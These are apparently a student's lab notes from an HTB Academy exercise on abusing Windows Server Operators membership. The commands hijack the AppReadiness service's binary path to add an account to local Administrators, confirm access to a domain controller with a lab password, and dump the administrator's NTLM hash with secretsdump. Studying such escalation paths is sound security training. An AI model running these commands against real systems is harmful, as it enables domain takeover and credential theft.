Server Operators
- The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges.
- It is a very highly privileged group that can log in locally to servers, including Domain Controllers.
- Query the AppReadiness service
sc.exe qc AppReadiness
- O/P says
SERVICE_START_NAME : LocalSystem
- If it says
LocalSystem, the service runs as SYSTEM. If it shows an account name (e.g., NT SERVICE\... or a user), it runs under that account instead.
- Checking Service Permissions with PsService
c:\Tools\PsService.exe security AppReadiness

- This confirms that the Server Operators group has SERVICE_ALL_ACCESS access right, which gives us full control over this service.
- Checking Local Admin Group Membership
net localgroup Administrators
- our target account is not present
- Modifying the Service Binary Path
sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
- Starting the Service
sc.exe start AppReadiness
- might fail which is expected
- Confirming Local Admin Group Membership
net localgroup Administrator
- our target use must be added here
- Confirming Local Admin Access on Domain Controller
nxc smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'
- Retrieving NTLM Password Hashes from the DC
secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator